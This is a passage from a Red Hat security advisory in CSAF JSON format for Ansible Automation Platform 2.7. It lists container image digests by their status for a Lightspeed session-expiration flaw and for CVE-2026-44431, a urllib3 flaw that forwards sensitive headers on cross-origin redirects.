"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "ansible-lightspeed: Ansible Lightspeed: Session hijacking and unauthorized data access due to insufficient session expiration"
},
{
"cve": "CVE-2026-44431",
"cwe": {
"id": "CWE-201",
"name": "Insertion of Sensitive Information Into Sent Data"
},
"discovery_date": "2026-05-13T17:01:41.663622+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477167"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in urllib3, an HTTP client library for Python. When using the low-level API via `ProxyManager.connection_from_url().urlopen()` with `assert_same_host=False`, cross-origin redirects can still forward sensitive headers. This could allow a remote attacker to gain unauthorized access to sensitive information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
